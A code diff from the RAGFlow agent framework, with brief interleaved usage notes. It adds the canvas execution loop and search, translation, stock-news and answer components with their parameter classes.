+ logging.exception(f"Canvas.run got exception: {e}")
226
+ self.path[-1].append(c)
227
+ ran += 1
228
+ raise e
229
+ self.path[-1].append(c)
230
+
231
+ ran += 1
232
+
233
+ downstream = self.components[self.path[-2][-1]]["downstream"]
234
+ if not downstream and self.components[self.path[-2][-1]].get("parent_id"):
235
+ cid = self.path[-2][-1]
236
+ pid = self.components[cid]["parent_id"]
237
+ o, _ = self.components[cid]["obj"].output(allow_partial=False)
238
+ oo, _ = self.components[pid]["obj"].output(allow_partial=False)
239
+ self.components[pid]["obj"].set(pd.concat([oo, o], ignore_index=True))
240
+ downstream = [pid]
241
+
242
+ for m in prepare2run(downstream):
243
+ yield {"content": m, "running_status": True}
244
+
245
+ while 0 <= ran < len(self.path[-1]):
246
+ logging.debug(f"Canvas.run: {ran} {self.path}")
247
+ cpn_id = self.path[-1][ran]
248
+ cpn = self.get_component(cpn_id)
249
+ if not any([cpn["downstream"], cpn.get("parent_id"), waiting]):
250
+ break
251
+
252
+ loop = self._find_loop()
253
+ if loop:
254
+ raise OverflowError(f"Too much loops: {loop}")
255
+
256
+ if cpn["obj"].component_name.lower() in ["switch", "categorize", "relevant"]:
257
+ switch_out = cpn["obj"].output()[1].iloc[0, 0]
258
+ assert switch_out in self.components, \
259
+ "{}'s output: {} not valid.".format(cpn_id, switch_out)
260
+ for m in prepare2run([switch_out]):
261
+ yield {"content": m, "running_status": True}
262
+ continue
263
+
264
+ downstream = cpn["downstream"]
265
+ if not downstream and cpn.get("parent_id"):
266
+ pid = cpn["parent_id"]
267
+ _, o = cpn["obj"].output(allow_partial=False)
268
+ _, oo = self.components[pid]["obj"].output(allow_partial=False)
269
+ self.components[pid]["obj"].set_output(pd.concat([oo.dropna(axis=1), o.dropna(axis=1)], ignore_index=True))
270
+ downstream = [pid]
271
+
272
+ for m in prepare2run(downstream):
273
+ yield {"content": m, "running_status": True}
274
+
275
+ if ran >= len(self.path[-1]) and waiting:
276
+ without_dependent_checking = waiting
277
+ waiting = []
278
+ for m in prepare2run(without_dependent_checking):
279
+ yield {"content": m, "running_status": True}
280
+ without_dependent_checking = []
281
+ ran -= 1
282
+
283
+ if self.answer:
284
+ cpn_id = self.answer[0]
285
+ self.answer.pop(0)
286
+ ans = self.components[cpn_id]["obj"].run(self.history, **kwargs)
287
+ self.path[-1].append(cpn_id)
288
+ if kwargs.get("stream"):
289
+ assert isinstance(ans, partial)
290
+ for an in ans():
291
+ yield an
292
+ else:
293
+ yield ans
294
+
295
+ else:
296
+ raise Exception("The dialog flow has no way to interact with you. Please add an 'Interact' component to the end of the flow.")
297
+
298
+ def get_component(self, cpn_id):
299
+ return self.components[cpn_id]
300
+
301
+ def get_tenant_id(self):
302
+ return self._tenant_id
303
+
304
+ def get_history(self, window_size):
305
+ convs = []
306
+ for role, obj in self.history[window_size * -1:]:
307
+ if isinstance(obj, list) and obj and all([isinstance(o, dict) for o in obj]):
308
+ convs.append({"role": role, "content": '\n'.join([str(s.get("content", "")) for s in obj])})
309
+ else:
310
+ convs.append({"role": role, "content": str(obj)})
311
+ return convs
312
+
313
+ def add_user_input(self, question):
314
+ self.history.append(("user", question))
315
+
316
+ def set_embedding_model(self, embed_id):
317
+ self._embed_id = embed_id
318
+
319
+ def get_embedding_model(self):
320
+ return self._embed_id
321
+
322
+ def _find_loop(self, max_loops=6):
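+ # Heuristic loop detection: walk the most recent execution path backwards and report a
+ # loop when a short component sequence repeats more than max_loops times.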
323
+ path = self.path[-1][::-1]
324
+ if len(path) < 2:
325
+ return False
326
+
327
+ for i in range(len(path)):
328
+ if path[i].lower().find("answer") == 0 or path[i].lower().find("iterationitem") == 0:
329
+ path = path[:i]
330
+ break
331
+
332
+ if len(path) < 2:
333
+ return False
334
+
335
+ for loc in range(2, len(path) // 2):
336
+ pat = ",".join(path[0:loc])
337
+ path_str = ",".join(path)
338
+ if len(pat) >= len(path_str):
339
+ return False
340
+ loop = max_loops
341
+ while path_str.find(pat) == 0 and loop >= 0:
342
+ loop -= 1
343
+ if len(pat)+1 >= len(path_str):
344
+ return False
345
+ path_str = path_str[len(pat)+1:]
346
+ if loop < 0:
347
+ pat = " => ".join([p.split(":")[0] for p in path[0:loc]])
348
+ return pat + " => " + pat
349
+
350
+ return False
351
+
352
+ def get_prologue(self):
353
+ return self.components["begin"]["obj"]._param.prologue
354
+
355
+ def set_global_param(self, **kwargs):
356
+ for k, v in kwargs.items():
357
+ for q in self.components["begin"]["obj"]._param.query:
358
+ if k != q["key"]:
359
+ continue
360
+ q["value"] = v
361
+
362
+ def get_preset_param(self):
363
+ return self.components["begin"]["obj"]._param.query
364
+
365
+ def get_component_input_elements(self, cpnnm):
366
+ return self.components[cpnnm]["obj"].get_input_elements()
ragflow-main/agent/component/__init__.py ADDED
@@ -0,0 +1,133 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+
17
+ import importlib
18
+ from .begin import Begin, BeginParam
19
+ from .generate import Generate, GenerateParam
20
+ from .retrieval import Retrieval, RetrievalParam
21
+ from .answer import Answer, AnswerParam
22
+ from .categorize import Categorize, CategorizeParam
23
+ from .switch import Switch, SwitchParam
24
+ from .relevant import Relevant, RelevantParam
25
+ from .message import Message, MessageParam
26
+ from .rewrite import RewriteQuestion, RewriteQuestionParam
27
+ from .keyword import KeywordExtract, KeywordExtractParam
28
+ from .concentrator import Concentrator, ConcentratorParam
29
+ from .baidu import Baidu, BaiduParam
30
+ from .duckduckgo import DuckDuckGo, DuckDuckGoParam
31
+ from .wikipedia import Wikipedia, WikipediaParam
32
+ from .pubmed import PubMed, PubMedParam
33
+ from .arxiv import ArXiv, ArXivParam
34
+ from .google import Google, GoogleParam
35
+ from .bing import Bing, BingParam
36
+ from .googlescholar import GoogleScholar, GoogleScholarParam
37
+ from .deepl import DeepL, DeepLParam
38
+ from .github import GitHub, GitHubParam
39
+ from .baidufanyi import BaiduFanyi, BaiduFanyiParam
40
+ from .qweather import QWeather, QWeatherParam
41
+ from .exesql import ExeSQL, ExeSQLParam
42
+ from .yahoofinance import YahooFinance, YahooFinanceParam
43
+ from .wencai import WenCai, WenCaiParam
44
+ from .jin10 import Jin10, Jin10Param
45
+ from .tushare import TuShare, TuShareParam
46
+ from .akshare import AkShare, AkShareParam
47
+ from .crawler import Crawler, CrawlerParam
48
+ from .invoke import Invoke, InvokeParam
49
+ from .template import Template, TemplateParam
50
+ from .email import Email, EmailParam
51
+ from .iteration import Iteration, IterationParam
52
+ from .iterationitem import IterationItem, IterationItemParam
53
+
54
+
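+ # Resolve a component class (e.g. "Retrieval") or its parameter class (e.g. "RetrievalParam")
+ # from this package by name; Canvas.load() uses this to instantiate DSL components.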
55
+ def component_class(class_name):
56
+ m = importlib.import_module("agent.component")
57
+ c = getattr(m, class_name)
58
+ return c
59
+
60
+
61
+ __all__ = [
62
+ "Begin",
63
+ "BeginParam",
64
+ "Generate",
65
+ "GenerateParam",
66
+ "Retrieval",
67
+ "RetrievalParam",
68
+ "Answer",
69
+ "AnswerParam",
70
+ "Categorize",
71
+ "CategorizeParam",
72
+ "Switch",
73
+ "SwitchParam",
74
+ "Relevant",
75
+ "RelevantParam",
76
+ "Message",
77
+ "MessageParam",
78
+ "RewriteQuestion",
79
+ "RewriteQuestionParam",
80
+ "KeywordExtract",
81
+ "KeywordExtractParam",
82
+ "Concentrator",
83
+ "ConcentratorParam",
84
+ "Baidu",
85
+ "BaiduParam",
86
+ "DuckDuckGo",
87
+ "DuckDuckGoParam",
88
+ "Wikipedia",
89
+ "WikipediaParam",
90
+ "PubMed",
91
+ "PubMedParam",
92
+ "ArXiv",
93
+ "ArXivParam",
94
+ "Google",
95
+ "GoogleParam",
96
+ "Bing",
97
+ "BingParam",
98
+ "GoogleScholar",
99
+ "GoogleScholarParam",
100
+ "DeepL",
101
+ "DeepLParam",
102
+ "GitHub",
103
+ "GitHubParam",
104
+ "BaiduFanyi",
105
+ "BaiduFanyiParam",
106
+ "QWeather",
107
+ "QWeatherParam",
108
+ "ExeSQL",
109
+ "ExeSQLParam",
110
+ "YahooFinance",
111
+ "YahooFinanceParam",
112
+ "WenCai",
113
+ "WenCaiParam",
114
+ "Jin10",
115
+ "Jin10Param",
116
+ "TuShare",
117
+ "TuShareParam",
118
+ "AkShare",
119
+ "AkShareParam",
120
+ "Crawler",
121
+ "CrawlerParam",
122
+ "Invoke",
123
+ "InvokeParam",
124
+ "Iteration",
125
+ "IterationParam",
126
+ "IterationItem",
127
+ "IterationItemParam",
128
+ "Template",
129
+ "TemplateParam",
130
+ "Email",
131
+ "EmailParam",
132
+ "component_class"
133
+ ]
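As a hedged usage sketch (the canvas object and the node id below are illustrative placeholders, not part of this diff), the `component_class` factory above lets a graph loader resolve both a component and its parameter class by name:

```python
# Hedged sketch: instantiating a component by name via the factory above.
# `canvas` and the node id "baidu:0" are illustrative placeholders.
from agent.component import component_class

cpn_cls = component_class("Baidu")            # component implementation
param_cls = component_class("BaiduParam")     # its parameter object

param = param_cls()
param.top_n = 5          # plain attribute; validated by param.check()
param.check()

# A real canvas would pass itself and a node id:
# cpn = cpn_cls(canvas, "baidu:0", param)
# df = cpn.run(history=[])
```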
ragflow-main/agent/component/akshare.py ADDED
@@ -0,0 +1,56 @@
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ from abc import ABC
17
+ import pandas as pd
18
+ from agent.component.base import ComponentBase, ComponentParamBase
19
+
20
+
21
+ class AkShareParam(ComponentParamBase):
22
+ """
23
+ Define the AkShare component parameters.
24
+ """
25
+
26
+ def __init__(self):
27
+ super().__init__()
28
+ self.top_n = 10
29
+
30
+ def check(self):
31
+ self.check_positive_integer(self.top_n, "Top N")
32
+
33
+
34
+ class AkShare(ComponentBase, ABC):
35
+ component_name = "AkShare"
36
+
37
+ def _run(self, history, **kwargs):
38
+ import akshare as ak
39
+ ans = self.get_input()
40
+ ans = ",".join(ans["content"]) if "content" in ans else ""
41
+ if not ans:
42
+ return AkShare.be_output("")
43
+
44
+ try:
45
+ ak_res = []
46
+ stock_news_em_df = ak.stock_news_em(symbol=ans)
47
+ stock_news_em_df = stock_news_em_df.head(self._param.top_n)
48
+ ak_res = [{"content": '<a href="' + i["新闻链接"] + '">' + i["新闻标题"] + '</a>\n 新闻内容: ' + i[
49
+ "新闻内容"] + " \n发布时间:" + i["发布时间"] + " \n文章来源: " + i["文章来源"]} for index, i in stock_news_em_df.iterrows()]
50
+ except Exception as e:
51
+ return AkShare.be_output("**ERROR**: " + str(e))
52
+
53
+ if not ak_res:
54
+ return AkShare.be_output("")
55
+
56
+ return pd.DataFrame(ak_res)
ragflow-main/agent/component/answer.py ADDED
@@ -0,0 +1,89 @@
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import random
17
+ from abc import ABC
18
+ from functools import partial
19
+ from typing import Tuple, Union
20
+
21
+ import pandas as pd
22
+
23
+ from agent.component.base import ComponentBase, ComponentParamBase
24
+
25
+
26
+ class AnswerParam(ComponentParamBase):
27
+
28
+ """
29
+ Define the Answer component parameters.
30
+ """
31
+ def __init__(self):
32
+ super().__init__()
33
+ self.post_answers = []
34
+
35
+ def check(self):
36
+ return True
37
+
38
+
39
+ class Answer(ComponentBase, ABC):
40
+ component_name = "Answer"
41
+
42
+ def _run(self, history, **kwargs):
43
+ if kwargs.get("stream"):
44
+ return partial(self.stream_output)
45
+
46
+ ans = self.get_input()
47
+ if self._param.post_answers:
48
+ ans = pd.concat([ans, pd.DataFrame([{"content": random.choice(self._param.post_answers)}])], ignore_index=False)
49
+ return ans
50
+
51
+ def stream_output(self):
52
+ res = None
53
+ if hasattr(self, "exception") and self.exception:
54
+ res = {"content": str(self.exception)}
55
+ self.exception = None
56
+ yield res
57
+ self.set_output(res)
58
+ return
59
+
60
+ stream = self.get_stream_input()
61
+ if isinstance(stream, pd.DataFrame):
62
+ res = stream
63
+ answer = ""
64
+ for ii, row in stream.iterrows():
65
+ answer += row.to_dict()["content"]
66
+ yield {"content": answer}
67
+ else:
68
+ for st in stream():
69
+ res = st
70
+ yield st
71
+ if self._param.post_answers:
72
+ res["content"] += random.choice(self._param.post_answers)
73
+ yield res
74
+
75
+ self.set_output(res)
76
+
77
+ def set_exception(self, e):
78
+ self.exception = e
79
+
80
+ def output(self, allow_partial=True) -> Tuple[str, Union[pd.DataFrame, partial]]:
81
+ if allow_partial:
82
+ return super().output(allow_partial)
83
+
84
+ for r, c in self._canvas.history[::-1]:
85
+ if r == "user":
86
+ return self._param.output_var_name, pd.DataFrame([{"content": c}])
87
+
88
+ return self._param.output_var_name, pd.DataFrame([])
89
+
ragflow-main/agent/component/arxiv.py ADDED
@@ -0,0 +1,68 @@
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import logging
17
+ from abc import ABC
18
+ import arxiv
19
+ import pandas as pd
20
+ from agent.component.base import ComponentBase, ComponentParamBase
21
+
22
+ class ArXivParam(ComponentParamBase):
23
+ """
24
+ Define the ArXiv component parameters.
25
+ """
26
+
27
+ def __init__(self):
28
+ super().__init__()
29
+ self.top_n = 6
30
+ self.sort_by = 'submittedDate'
31
+
32
+ def check(self):
33
+ self.check_positive_integer(self.top_n, "Top N")
34
+ self.check_valid_value(self.sort_by, "ArXiv Search Sort_by",
35
+ ['submittedDate', 'lastUpdatedDate', 'relevance'])
36
+
37
+
38
+ class ArXiv(ComponentBase, ABC):
39
+ component_name = "ArXiv"
40
+
41
+ def _run(self, history, **kwargs):
42
+ ans = self.get_input()
43
+ ans = " - ".join(ans["content"]) if "content" in ans else ""
44
+ if not ans:
45
+ return ArXiv.be_output("")
46
+
47
+ try:
48
+ sort_choices = {"relevance": arxiv.SortCriterion.Relevance,
49
+ "lastUpdatedDate": arxiv.SortCriterion.LastUpdatedDate,
50
+ 'submittedDate': arxiv.SortCriterion.SubmittedDate}
51
+ arxiv_client = arxiv.Client()
52
+ search = arxiv.Search(
53
+ query=ans,
54
+ max_results=self._param.top_n,
55
+ sort_by=sort_choices[self._param.sort_by]
56
+ )
57
+ arxiv_res = [
58
+ {"content": 'Title: ' + i.title + '\nPdf_Url: <a href="' + i.pdf_url + '"></a> \nSummary: ' + i.summary} for
59
+ i in list(arxiv_client.results(search))]
60
+ except Exception as e:
61
+ return ArXiv.be_output("**ERROR**: " + str(e))
62
+
63
+ if not arxiv_res:
64
+ return ArXiv.be_output("")
65
+
66
+ df = pd.DataFrame(arxiv_res)
67
+ logging.debug(f"df: {str(df)}")
68
+ return df
ragflow-main/agent/component/baidu.py ADDED
@@ -0,0 +1,67 @@
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import logging
17
+ from abc import ABC
18
+ import pandas as pd
19
+ import requests
20
+ import re
21
+ from agent.component.base import ComponentBase, ComponentParamBase
22
+
23
+
24
+ class BaiduParam(ComponentParamBase):
25
+ """
26
+ Define the Baidu component parameters.
27
+ """
28
+
29
+ def __init__(self):
30
+ super().__init__()
31
+ self.top_n = 10
32
+
33
+ def check(self):
34
+ self.check_positive_integer(self.top_n, "Top N")
35
+
36
+
37
+ class Baidu(ComponentBase, ABC):
38
+ component_name = "Baidu"
39
+
40
+ def _run(self, history, **kwargs):
41
+ ans = self.get_input()
42
+ ans = " - ".join(ans["content"]) if "content" in ans else ""
43
+ if not ans:
44
+ return Baidu.be_output("")
45
+
46
+ try:
47
+ url = 'http://www.baidu.com/s?wd=' + ans + '&rn=' + str(self._param.top_n)
48
+ headers = {
49
+ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36'}
50
+ response = requests.get(url=url, headers=headers)
51
+
52
+ url_res = re.findall(r"'url': \\\"(.*?)\\\"}", response.text)
53
+ title_res = re.findall(r"'title': \\\"(.*?)\\\",\\n", response.text)
54
+ body_res = re.findall(r"\"contentText\":\"(.*?)\"", response.text)
55
+ baidu_res = [{"content": re.sub('<em>|</em>', '', '<a href="' + url + '">' + title + '</a> ' + body)} for
56
+ url, title, body in zip(url_res, title_res, body_res)]
57
+ del body_res, url_res, title_res
58
+ except Exception as e:
59
+ return Baidu.be_output("**ERROR**: " + str(e))
60
+
61
+ if not baidu_res:
62
+ return Baidu.be_output("")
63
+
64
+ df = pd.DataFrame(baidu_res)
65
+ logging.debug(f"df: {str(df)}")
66
+ return df
67
+
ragflow-main/agent/component/baidufanyi.py ADDED
@@ -0,0 +1,96 @@
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import random
17
+ from abc import ABC
18
+ import requests
19
+ from agent.component.base import ComponentBase, ComponentParamBase
20
+ from hashlib import md5
21
+
22
+
23
+ class BaiduFanyiParam(ComponentParamBase):
24
+ """
25
+ Define the BaiduFanyi component parameters.
26
+ """
27
+
28
+ def __init__(self):
29
+ super().__init__()
30
+ self.appid = "xxx"
31
+ self.secret_key = "xxx"
32
+ self.trans_type = 'translate'
33
+ self.parameters = []
34
+ self.source_lang = 'auto'
35
+ self.target_lang = 'auto'
36
+ self.domain = 'finance'
37
+
38
+ def check(self):
39
+ self.check_empty(self.appid, "BaiduFanyi APPID")
40
+ self.check_empty(self.secret_key, "BaiduFanyi Secret Key")
41
+ self.check_valid_value(self.trans_type, "Translate type", ['translate', 'fieldtranslate'])
42
+ self.check_valid_value(self.source_lang, "Source language",
43
+ ['auto', 'zh', 'en', 'yue', 'wyw', 'jp', 'kor', 'fra', 'spa', 'th', 'ara', 'ru', 'pt',
44
+ 'de', 'it', 'el', 'nl', 'pl', 'bul', 'est', 'dan', 'fin', 'cs', 'rom', 'slo', 'swe',
45
+ 'hu', 'cht', 'vie'])
46
+ self.check_valid_value(self.target_lang, "Target language",
47
+ ['auto', 'zh', 'en', 'yue', 'wyw', 'jp', 'kor', 'fra', 'spa', 'th', 'ara', 'ru', 'pt',
48
+ 'de', 'it', 'el', 'nl', 'pl', 'bul', 'est', 'dan', 'fin', 'cs', 'rom', 'slo', 'swe',
49
+ 'hu', 'cht', 'vie'])
50
+ self.check_valid_value(self.domain, "Translate field",
51
+ ['it', 'finance', 'machinery', 'senimed', 'novel', 'academic', 'aerospace', 'wiki',
52
+ 'news', 'law', 'contract'])
53
+
54
+
55
+ class BaiduFanyi(ComponentBase, ABC):
56
+ component_name = "BaiduFanyi"
57
+
58
+ def _run(self, history, **kwargs):
59
+
60
+ ans = self.get_input()
61
+ ans = " - ".join(ans["content"]) if "content" in ans else ""
62
+ if not ans:
63
+ return BaiduFanyi.be_output("")
64
+
65
+ try:
66
+ source_lang = self._param.source_lang
67
+ target_lang = self._param.target_lang
68
+ appid = self._param.appid
69
+ salt = str(random.randint(32768, 65536))
70
+ secret_key = self._param.secret_key
71
+
72
+ if self._param.trans_type == 'translate':
73
+ sign = md5((appid + ans + salt + secret_key).encode('utf-8')).hexdigest()
74
+ url = 'http://api.fanyi.baidu.com/api/trans/vip/translate?' + 'q=' + ans + '&from=' + source_lang + '&to=' + target_lang + '&appid=' + appid + '&salt=' + salt + '&sign=' + sign
75
+ headers = {"Content-Type": "application/x-www-form-urlencoded"}
76
+ response = requests.post(url=url, headers=headers).json()
77
+
78
+ if response.get('error_code'):
79
+ return BaiduFanyi.be_output("**Error**:" + response['error_msg'])
80
+
81
+ return BaiduFanyi.be_output(response['trans_result'][0]['dst'])
82
+ elif self._param.trans_type == 'fieldtranslate':
83
+ domain = self._param.domain
84
+ sign = md5((appid + ans + salt + domain + secret_key).encode('utf-8')).hexdigest()
85
+ url = 'http://api.fanyi.baidu.com/api/trans/vip/fieldtranslate?' + 'q=' + ans + '&from=' + source_lang + '&to=' + target_lang + '&appid=' + appid + '&salt=' + salt + '&domain=' + domain + '&sign=' + sign
86
+ headers = {"Content-Type": "application/x-www-form-urlencoded"}
87
+ response = requests.post(url=url, headers=headers).json()
88
+
89
+ if response.get('error_code'):
90
+ return BaiduFanyi.be_output("**Error**:" + response['error_msg'])
91
+
92
+ return BaiduFanyi.be_output(response['trans_result'][0]['dst'])
93
+
94
+ except Exception as e:
95
+ return BaiduFanyi.be_output("**Error**:" + str(e))
96
+
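For context, a hedged sketch of the signing convention the code above follows: Baidu's translate API computes sign = MD5(appid + query + salt + secret_key) and expects `salt` to be sent as a string, which is why the salt is stringified before concatenation. The credentials below are placeholders.

```python
# Hedged sketch of the request-signing step used by the component above.
import random
from hashlib import md5

appid, secret_key, query = "20240000000000000", "my-secret", "hello"
salt = str(random.randint(32768, 65536))      # must be a string for concatenation
sign = md5((appid + query + salt + secret_key).encode("utf-8")).hexdigest()
params = {"q": query, "from": "auto", "to": "zh",
          "appid": appid, "salt": salt, "sign": sign}
```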
ragflow-main/agent/component/base.py ADDED
@@ -0,0 +1,586 @@
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ from abc import ABC
17
+ import builtins
18
+ import json
19
+ import os
20
+ import logging
21
+ from functools import partial
22
+ from typing import Tuple, Union
23
+
24
+ import pandas as pd
25
+
26
+ from agent import settings
27
+
28
+ _FEEDED_DEPRECATED_PARAMS = "_feeded_deprecated_params"
29
+ _DEPRECATED_PARAMS = "_deprecated_params"
30
+ _USER_FEEDED_PARAMS = "_user_feeded_params"
31
+ _IS_RAW_CONF = "_is_raw_conf"
32
+
33
+
34
+ class ComponentParamBase(ABC):
35
+ def __init__(self):
36
+ self.output_var_name = "output"
37
+ self.message_history_window_size = 22
38
+ self.query = []
39
+ self.inputs = []
40
+ self.debug_inputs = []
41
+
42
+ def set_name(self, name: str):
43
+ self._name = name
44
+ return self
45
+
46
+ def check(self):
47
+ raise NotImplementedError("Parameter Object should be checked.")
48
+
49
+ @classmethod
50
+ def _get_or_init_deprecated_params_set(cls):
51
+ if not hasattr(cls, _DEPRECATED_PARAMS):
52
+ setattr(cls, _DEPRECATED_PARAMS, set())
53
+ return getattr(cls, _DEPRECATED_PARAMS)
54
+
55
+ def _get_or_init_feeded_deprecated_params_set(self, conf=None):
56
+ if not hasattr(self, _FEEDED_DEPRECATED_PARAMS):
57
+ if conf is None:
58
+ setattr(self, _FEEDED_DEPRECATED_PARAMS, set())
59
+ else:
60
+ setattr(
61
+ self,
62
+ _FEEDED_DEPRECATED_PARAMS,
63
+ set(conf[_FEEDED_DEPRECATED_PARAMS]),
64
+ )
65
+ return getattr(self, _FEEDED_DEPRECATED_PARAMS)
66
+
67
+ def _get_or_init_user_feeded_params_set(self, conf=None):
68
+ if not hasattr(self, _USER_FEEDED_PARAMS):
69
+ if conf is None:
70
+ setattr(self, _USER_FEEDED_PARAMS, set())
71
+ else:
72
+ setattr(self, _USER_FEEDED_PARAMS, set(conf[_USER_FEEDED_PARAMS]))
73
+ return getattr(self, _USER_FEEDED_PARAMS)
74
+
75
+ def get_user_feeded(self):
76
+ return self._get_or_init_user_feeded_params_set()
77
+
78
+ def get_feeded_deprecated_params(self):
79
+ return self._get_or_init_feeded_deprecated_params_set()
80
+
81
+ @property
82
+ def _deprecated_params_set(self):
83
+ return {name: True for name in self.get_feeded_deprecated_params()}
84
+
85
+ def __str__(self):
86
+ return json.dumps(self.as_dict(), ensure_ascii=False)
87
+
88
+ def as_dict(self):
89
+ def _recursive_convert_obj_to_dict(obj):
90
+ ret_dict = {}
91
+ for attr_name in list(obj.__dict__):
92
+ if attr_name in [_FEEDED_DEPRECATED_PARAMS, _DEPRECATED_PARAMS, _USER_FEEDED_PARAMS, _IS_RAW_CONF]:
93
+ continue
94
+ # get attr
95
+ attr = getattr(obj, attr_name)
96
+ if isinstance(attr, pd.DataFrame):
97
+ ret_dict[attr_name] = attr.to_dict()
98
+ continue
99
+ if attr and type(attr).__name__ not in dir(builtins):
100
+ ret_dict[attr_name] = _recursive_convert_obj_to_dict(attr)
101
+ else:
102
+ ret_dict[attr_name] = attr
103
+
104
+ return ret_dict
105
+
106
+ return _recursive_convert_obj_to_dict(self)
107
+
108
+ def update(self, conf, allow_redundant=False):
109
+ update_from_raw_conf = conf.get(_IS_RAW_CONF, True)
110
+ if update_from_raw_conf:
111
+ deprecated_params_set = self._get_or_init_deprecated_params_set()
112
+ feeded_deprecated_params_set = (
113
+ self._get_or_init_feeded_deprecated_params_set()
114
+ )
115
+ user_feeded_params_set = self._get_or_init_user_feeded_params_set()
116
+ setattr(self, _IS_RAW_CONF, False)
117
+ else:
118
+ feeded_deprecated_params_set = (
119
+ self._get_or_init_feeded_deprecated_params_set(conf)
120
+ )
121
+ user_feeded_params_set = self._get_or_init_user_feeded_params_set(conf)
122
+
123
+ def _recursive_update_param(param, config, depth, prefix):
124
+ if depth > settings.PARAM_MAXDEPTH:
125
+ raise ValueError("Param define nesting too deep!!!, can not parse it")
126
+
127
+ inst_variables = param.__dict__
128
+ redundant_attrs = []
129
+ for config_key, config_value in config.items():
130
+ # redundant attr
131
+ if config_key not in inst_variables:
132
+ if not update_from_raw_conf and config_key.startswith("_"):
133
+ setattr(param, config_key, config_value)
134
+ else:
135
+ setattr(param, config_key, config_value)
136
+ # redundant_attrs.append(config_key)
137
+ continue
138
+
139
+ full_config_key = f"{prefix}{config_key}"
140
+
141
+ if update_from_raw_conf:
142
+ # add user feeded params
143
+ user_feeded_params_set.add(full_config_key)
144
+
145
+ # update user feeded deprecated param set
146
+ if full_config_key in deprecated_params_set:
147
+ feeded_deprecated_params_set.add(full_config_key)
148
+
149
+ # supported attr
150
+ attr = getattr(param, config_key)
151
+ if type(attr).__name__ in dir(builtins) or attr is None:
152
+ setattr(param, config_key, config_value)
153
+
154
+ else:
155
+ # recursive set obj attr
156
+ sub_params = _recursive_update_param(
157
+ attr, config_value, depth + 1, prefix=f"{prefix}{config_key}."
158
+ )
159
